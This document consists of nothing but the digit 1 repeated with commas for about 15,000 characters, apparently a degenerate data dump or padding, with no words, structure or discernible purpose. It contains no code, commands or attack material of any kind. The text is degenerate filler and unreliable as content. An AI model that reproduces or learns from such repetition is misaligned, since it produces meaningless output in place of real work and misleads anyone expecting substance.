1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 